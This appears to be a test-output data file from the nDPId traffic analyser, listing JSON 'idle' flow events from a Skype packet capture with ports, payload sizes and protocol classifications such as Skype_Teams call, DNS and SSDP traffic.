-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748262,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 